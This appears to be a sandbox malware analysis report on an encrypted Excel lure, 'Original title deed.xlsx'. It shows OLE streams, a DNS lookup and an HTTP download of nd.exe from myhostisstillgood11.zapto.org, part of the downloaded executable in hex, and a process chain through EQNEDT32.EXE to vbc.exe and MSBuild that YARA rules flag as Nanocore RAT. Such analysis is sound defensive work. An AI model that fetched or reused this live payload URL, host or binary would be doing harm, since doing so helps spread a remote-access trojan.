                            SSDEEP:24576:rgV856CB2LCNZOjvtg+Ff7ypoPcKy0pdW7BGpMfhgkraUZzrr54810Qthst:UV+syzoypWcVKMpgkrbZzrra810uGt
                            File Content Preview:........................>...............................................................................................z.......|.......~......................................................................................................................

                            File Icon

                            Icon Hash:e4e2aa8aa4b4bcb4

                            Static OLE Info

                            General

                            Document Type:OLE
                            Number of OLE Files:1

                            OLE File "Original title deed.xlsx"

                            Indicators

                            Has Summary Info:False
                            Application Name:unknown
                            Encrypted Document:True
                            Contains Word Document Stream:False
                            Contains Workbook/Book Stream:False
                            Contains PowerPoint Document Stream:False
                            Contains Visio Document Stream:False
                            Contains ObjectPool Stream:
                            Flash Objects Count:
                            Contains VBA Macros:False

                            Streams

                            Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                            General
                            Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                            File Type:data
                            Stream Size:64
                            Entropy:2.73637206947
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                            Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                            Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                            General
                            Stream Path:\x6DataSpaces/DataSpaceMap
                            File Type:data
                            Stream Size:112
                            Entropy:2.7597816111
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                            Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                            Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                            General
                            Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                            File Type:data
                            Stream Size:200
                            Entropy:3.13335930328
                            Base64 Encoded:False
                            Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                            Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                            General
                            Stream Path:\x6DataSpaces/Version
                            File Type:data
                            Stream Size:76
                            Entropy:2.79079600998
                            Base64 Encoded:False
                            Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                            Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                            Stream Path: EncryptedPackage, File Type: data, Stream Size: 1160504
                            General
                            Stream Path:EncryptedPackage
                            File Type:data
                            Stream Size:1160504
                            Entropy:7.99982473669
                            Base64 Encoded:True
                            Data ASCII:% . . . . . . . . . . . . . . . . . H . . 8 , . . . . C . . . . . 7 . $ . . . ? . . . . . . . . . m Y 9 ? 3 . . ^ 6 ^ . 3 . I . . . . - 8 . . . . . $ e x . . . . y . > . . 4 . . . $ e x . . . . y . > . . 4 . . . $ e x . . . . y . > . . 4 . . . $ e x . . . . y . > . . 4 . . . $ e x . . . . y . > . . 4 . . . $ e x . . . . y . > . . 4 . . . $ e x . . . . y . > . . 4 . . . $ e x . . . . y . > . . 4 . . . $ e x . . . . y . > . . 4 . . . $ e x . . . . y . > . . 4 . . . $ e x . . . . y . > . . 4 . . . $ e x . . .
                            Data Raw:25 b5 11 00 00 00 00 00 12 8d fa a7 ed 03 db 80 be de 48 af 1d 38 2c be 82 f0 85 43 bb 89 b3 cc 1e 37 00 24 d5 bc aa 3f ad da fe f4 9c c8 08 c6 bf 6d 59 39 3f 33 08 1b 5e 36 5e cf 33 04 49 ef 03 d6 ad 2d 38 0f fe d5 a3 d8 24 65 78 f9 f3 fb e6 79 0e 3e c4 05 34 df a3 d8 24 65 78 f9 f3 fb e6 79 0e 3e c4 05 34 df a3 d8 24 65 78 f9 f3 fb e6 79 0e 3e c4 05 34 df a3 d8 24 65 78 f9 f3 fb
                            Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                            General
                            Stream Path:EncryptionInfo
                            File Type:data
                            Stream Size:224
                            Entropy:4.52717392857
                            Base64 Encoded:False
                            Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . [ . . s M . . u . . 9 ~ . . . . . . . . . . . } . . . . . . . . . a . . w . 7 d . . . 0 . C . . U . . . . . . D . ! 1 k 5 l M .
                            Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            May 3, 2021 14:55:40.404555082 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:40.605144978 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:40.605222940 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:40.605653048 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:40.807997942 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:40.808027983 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:40.808039904 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:40.808057070 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:40.808232069 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.008461952 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.008495092 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.008507013 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.008519888 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.008538961 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.008554935 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.008573055 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.008589029 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.008675098 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.209563971 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.209604979 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.209624052 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.209641933 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.209657907 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.209676027 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.209691048 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.209707975 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.209737062 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.209748983 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.209760904 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.209774017 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.209830046 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.209866047 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.213485956 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.411437035 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.411473036 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.411484957 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.411497116 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.411518097 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.411530018 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.411545038 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.411561966 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.411581993 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.411601067 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.411617041 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.411784887 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.411962986 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.411981106 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.412000895 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.412019014 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.412035942 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.412050962 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.412067890 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.412079096 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.412091017 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.412111044 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.412148952 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.414040089 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.614855051 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.614895105 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.614908934 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.614927053 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.614944935 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.614962101 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.614979029 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.614993095 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.615005016 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.615010023 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.615027905 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.615032911 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.615046978 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.615046978 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.615066051 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.615067959 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.615081072 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.615084887 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.615098000 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.615106106 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.615114927 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.615124941 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.615139008 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.615143061 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.615155935 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.615163088 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.615175962 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.615180016 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.615191936 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.615197897 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.615207911 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.615215063 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.615226030 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.615231991 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.615241051 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.615252972 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.615261078 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.615272999 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.615289927 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.615293980 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.615305901 CEST4916580192.168.2.22172.245.45.28
                            May 3, 2021 14:55:41.615307093 CEST8049165172.245.45.28192.168.2.22
                            May 3, 2021 14:55:41.615320921 CEST4916580192.168.2.22172.245.45.28

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            May 3, 2021 14:55:40.334424973 CEST5219753192.168.2.228.8.8.8
                            May 3, 2021 14:55:40.393349886 CEST53521978.8.8.8192.168.2.22

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                            May 3, 2021 14:55:40.334424973 CEST192.168.2.228.8.8.80xccaeStandard query (0)myhostisstillgood11.zapto.orgA (IP address)IN (0x0001)

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                            May 3, 2021 14:55:40.393349886 CEST8.8.8.8192.168.2.220xccaeNo error (0)myhostisstillgood11.zapto.org172.245.45.28A (IP address)IN (0x0001)

                            HTTP Request Dependency Graph

                            • myhostisstillgood11.zapto.org

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.2249165172.245.45.2880C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                            TimestampkBytes transferredDirectionData
                            May 3, 2021 14:55:40.605653048 CEST0OUTGET /dashboard/docs/images/nd.exe HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                            Host: myhostisstillgood11.zapto.org
                            Connection: Keep-Alive
                            May 3, 2021 14:55:40.807997942 CEST2INHTTP/1.1 200 OK
                            Date: Mon, 03 May 2021 12:55:40 GMT
                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3
                            Last-Modified: Mon, 03 May 2021 07:04:16 GMT
                            ETag: "923fb-5c16791e13768"
                            Accept-Ranges: bytes
                            Content-Length: 599035
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: application/x-msdownload
                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 29 81 e9 50 47 d2 e9 50 47 d2 e9 50 47 d2 2a 5f 18 d2 eb 50 47 d2 e9 50 46 d2 49 50 47 d2 2a 5f 1a d2 e6 50 47 d2 bd 73 77 d2 e3 50 47 d2 2e 56 41 d2 e8 50 47 d2 52 69 63 68 e9 50 47 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e4 d6 24 5f 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 64 00 00 00 d0 01 00 00 04 00 00 61 34 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 84 00 00 a0 00 00 00 00 d0 02 00 c8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3c 62 00 00 00 10 00 00 00 64 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 74 12 00 00 00 80 00 00 00 14 00 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 a8 01 00 00 a0 00 00 00 06 00 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 c8 0b 00 00 00 d0 02 00 00 0c 00 00 00 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1)PGPGPG*_PGPFIPG*_PGswPG.VAPGRichPGPEL$_da4@@8.text<bd `.rdatath@@.dataX|@.ndataP.rsrc@@


                            Code Manipulations

                            Statistics

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Start time:14:54:43
                            Start date:03/05/2021
                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            Wow64 process (32bit):false
                            Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                            Imagebase:0x13fb60000
                            File size:27641504 bytes
                            MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:14:55:04
                            Start date:03/05/2021
                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                            Wow64 process (32bit):true
                            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                            Imagebase:0x400000
                            File size:543304 bytes
                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:14:55:08
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:low

                            General

                            Start time:14:55:09
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0xf00000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:moderate

                            General

                            Start time:14:55:14
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:low

                            General

                            Start time:14:55:17
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x1340000
                            File size:261944 bytes
                            MD5 hash:7FB523211C53D4AB3213874451A928AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:moderate

                            General

                            Start time:14:55:22
                            Start date:03/05/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\vbc.exe'
                            Imagebase:0x400000
                            File size:599035 bytes
                            MD5 hash:669DD51D521BE84D6F2C45012115FC5F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:low

                            General

                            Start time:14:55:23
                            Start date:03/05/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):false
